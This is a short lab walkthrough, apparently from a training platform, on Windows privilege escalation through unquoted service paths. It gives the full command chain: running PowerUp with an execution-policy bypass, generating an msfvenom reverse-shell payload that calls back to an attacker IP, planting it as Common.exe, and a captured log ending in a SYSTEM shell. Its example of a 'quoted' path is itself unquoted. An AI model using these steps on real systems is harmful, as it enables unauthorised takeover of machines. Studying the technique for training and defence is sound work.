Unquoted Service Paths

If the path to start a service is not quoted off(encapsulated in quotes) then it is possible to add our own service inbetween the spaces in the path and have it execute. For example: if a service has a path of C:\Program Files\My Service\myservice.exe and not a path of C:\Program Files\My Service\myservice.exe then the service will first look for C:\Program.exe and then C:\Program Files.exe and then C:\Program Files\My.exe and on and on until it gets to myservice.exe. Having quotes around the path prevents this entirely as the entire path is encapsulated in between quotes.

Powerup will display services with unquoted paths

powershell -ep bypass
. .\Powerup.ps1
Invoke-AllChecks

The “Common Files” folder is writeable to everyone and has a space so we can create a payload named “Common.exe” and put it into the “Common Files” folder.

msfvenom -p windows/reverse_tcp LHOST=10.4.26.4 LPORT=5555 -f exe > Common.exe

Start the service

sc start unquotedsvc
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.4.26.4:5555
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.159.221
[*] Command shell session 1 opened (10.4.26.4:5555 -> 10.10.159.221:49218) at 2021-10-18 00:18:07 -0400

C:\Windows\system32>whoami
whoami
nt authority\system